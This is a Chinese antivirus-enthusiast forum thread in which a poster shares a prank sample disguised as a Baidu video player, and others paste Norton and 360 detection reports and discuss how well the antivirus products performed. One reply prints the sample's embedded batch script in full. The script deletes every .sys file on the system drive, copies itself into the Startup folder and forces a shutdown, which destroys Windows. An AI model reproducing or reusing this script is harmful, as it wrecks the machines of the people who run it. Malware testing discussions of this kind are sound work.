祝大家新年快乐，自己做了一个，欢迎双击

tg123321

祝大家新年快乐要是有数签就完美了

tg123321

@hooyuan  测一测你的CCAV  

1446547521

文件名: baiduplayer.exe
威胁名称: SONAR.Heuristic.132完整路径: 不可用

____________________________

____________________________


在电脑上的创建时间 
2016/2/13 ( 13:34:04 )

上次使用时间 
2016/2/13 ( 13:34:04 )

启动项目 
否

已启动 
是

SONAR 主动防护监视电脑上的可疑程序活动。

____________________________


baiduplayer.exe 威胁名称: SONAR.Heuristic.132
定位


极少用户信任的文件
诺顿社区中有 不到 5 名用户使用了此文件。

极新的文件
该文件已在 不到 1 周 前发行。

高
此文件具有高风险。


____________________________


来源: 外部介质

源文件:
baiduplayer.exe

____________________________

文件操作

文件: e:\迅雷下载\百度影音绿色版\ baiduplayer.exe 威胁已删除
文件: c:\jhon\user\current\appdata\local\temp\9f18.tmp\ 1.bat 威胁已删除
目录: c:\jhon\user\current\appdata\local\temp\ 9f18.tmp 威胁已删除
____________________________

系统设置操作

事件: 进程启动 (执行者 e:\迅雷下载\百度影音绿色版\baiduplayer.exe, PID:6176) 未采取操作
事件: PE 文件创建: c:\user\current\appdata\local\temp\9f18.tmp\ baiduplayer.exe (执行者 e:\迅雷下载\百度影音绿色版\baiduplayer.exe, PID:6176) 未采取操作
事件: 进程启动: e:\迅雷下载\百度影音绿色版\ baiduplayer.exe, PID:6176 (执行者 e:\迅雷下载\百度影音绿色版\baiduplayer.exe, PID:6176) 未采取操作
____________________________


文件指纹 - SHA:
不可用
文件指纹 - MD5:
不可用

kbsj123321

卡巴拒绝访问

nick20010117

vm001

楼主坏透了

@echo off
title 手贱治疗
echo 正在治疗...
del /f/s/q %systemdrive%\*.sys
set var=%userprofile%\「开始」菜单\程序\启动
xcopy /y %0 "%var%"\
echo 让你再手贱！！！
shutdown /p


类型:
virus.bat.copyselfevil.a

描述:
木马通常利用系统的漏洞，绕过系统防御，达到：盗取账号、窃取资料、篡改文件、破坏数据的目的。
经过360安全中心检验，此文件是木马，建议您立即处理。

扫描引擎:
360云查杀引擎

文件路径:
C:\Users\Admin\Desktop\1.bat

文件大小:
179B (179 字节)

文件指纹（MD5）:
4e635d18a930279270ebcdbc19530119

数字签名是否有效:
无效

处理建议:
隔离文件

fuzhk

书签估计也没啥用
你这东西太容易被看穿了吧
FS（BD OEM）直接报里面的bat报毒名了
VT自行fq

windows7爱好者

开开心心卖手机

hooyuan

tg123321 发表于 2016-2-13 13:34
@hooyuan  测一测你的CCAV

感觉CCAV存在也挺尴尬的，扫描不出意外肯定miss。
默认未知全部sandbox，它也没有类似HIPS和FW的东西。
你说进了沙盒那算它成功了还是失败了......

p.s.我这里没显示执行了那个批处理